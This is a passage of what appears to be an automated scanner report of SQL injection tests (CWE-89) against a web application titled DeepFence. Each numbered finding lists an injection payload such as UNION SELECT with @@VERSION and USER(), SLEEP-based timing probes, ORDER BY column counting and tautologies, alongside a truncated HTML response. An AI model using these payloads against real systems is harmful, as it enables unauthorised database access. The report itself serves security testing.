initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1610\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(\n1000000,MD5('A')),\n5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1611\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1612\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1613Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language\n=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\n\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-\naed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-\n- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSB\nJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgA\nQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1614\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1615\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# OR x=x#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1616\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# \") or sleep(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1617\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1618\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1619\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# /*!10000%201/0%20*/\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1620\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 30#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1621\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/Request GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY SLEEP(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1622\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 7300=7300 AND ('pKlZ'='\npKlZ\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1623\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '&&SLEEP(5)&&'1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 